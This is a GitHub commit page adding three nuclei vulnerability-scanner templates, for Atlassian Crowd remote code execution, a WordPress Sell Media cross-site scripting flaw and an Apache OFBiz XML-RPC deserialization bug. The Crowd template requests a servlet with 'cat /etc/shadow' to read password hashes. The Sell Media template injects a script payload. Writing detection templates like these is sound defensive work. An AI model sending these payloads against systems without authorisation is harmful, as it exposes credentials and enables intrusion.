Skip to content

Commit 7cda824

Browse files
authored
Merge pull request #312 from dwisiswant0/tpl/add-cves
Add CVEs (CVE-2020-9496, CVE-2019-6112 & CVE-2019-11580)
2 parents 6f6af47 + 7747dd4 commit 7cda824

File tree

3 files changed

+123
-0
lines changed

3 files changed

+123
-0
lines changed

cves/CVE-2019-11580.yaml

Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
id: CVE-2019-11580
2+
3+
info:
4+
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
5+
author: dwisiswant0
6+
severity: critical
7+
8+
# Atlassian Crowd and Crowd Data Center
9+
# had the pdkinstall development plugin incorrectly enabled in release builds.
10+
# Attackers who can send unauthenticated or authenticated requests
11+
# to a Crowd or Crowd Data Center instance can exploit this vulnerability
12+
# to install arbitrary plugins, which permits remote code execution on
13+
# systems running a vulnerable version of Crowd or Crowd Data Center.
14+
# All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
15+
# from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
16+
# from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
17+
# from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
18+
# and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
19+
# -
20+
# References:
21+
# > https://github.com/jas502n/CVE-2019-11580
22+
23+
requests:
24+
- method: GET
25+
path:
26+
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
27+
- "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
28+
matchers-condition: and
29+
matchers:
30+
- type: word
31+
words:
32+
- "root:*:"
33+
- "bin:*:"
34+
condition: and
35+
part: body
36+
- type: status
37+
status:
38+
- 200

cves/CVE-2019-6112.yaml

Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
id: CVE-2019-6112
2+
3+
info:
4+
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
5+
author: dwisiswant0
6+
severity: medium
7+
8+
# A Cross-site scripting (XSS) vulnerability
9+
# in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
10+
# allows remote attackers to inject arbitrary web script or HTML
11+
# via the keyword parameter (aka $search_term or the Search field).
12+
# --
13+
# References:
14+
# > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
15+
16+
requests:
17+
- method: GET
18+
path:
19+
- "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
20+
matchers-condition: and
21+
matchers:
22+
- type: word
23+
words:
24+
- "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
25+
- "alert(1337)"
26+
condition: and
27+
part: body
28+
- type: status
29+
status:
30+
- 200

cves/CVE-2020-9496.yaml

Lines changed: 55 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
id: CVE-2020-9496
2+
3+
info:
4+
name: Apache OFBiz XML-RPC Java Deserialization
5+
author: dwisiswant0
6+
severity: medium
7+
8+
# This temaplte detects a Java deserialization vulnerability in Apache
9+
# OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
10+
# versions prior to 17.12.04.
11+
# --
12+
# References:
13+
# - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
14+
15+
requests:
16+
- raw:
17+
- |
18+
POST /webtools/control/xmlrpc HTTP/1.1
19+
Host: {{Hostname}}
20+
Origin: http://{{Hostname}}
21+
Content-Type: application/xml
22+
23+
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
24+
25+
- |
26+
POST /webtools/control/xmlrpc HTTP/1.1
27+
Host: {{Hostname}}:8080
28+
Origin: http://{{Hostname}}:8080
29+
Content-Type: application/xml
30+
31+
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
32+
33+
- |
34+
POST /webtools/control/xmlrpc HTTP/1.1
35+
Host: {{Hostname}}:8443
36+
Origin: https://{{Hostname}}:8443
37+
Content-Type: application/xml
38+
39+
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
40+
matchers-condition: and
41+
matchers:
42+
- type: word
43+
words:
44+
- "faultString"
45+
- "No such service [ProjectDiscovery]"
46+
- "methodResponse"
47+
condition: and
48+
part: body
49+
- type: word
50+
words:
51+
- "Content-Type: text/xml"
52+
part: header
53+
- type: status
54+
status:
55+
- 200

0 commit comments

Comments
 (0)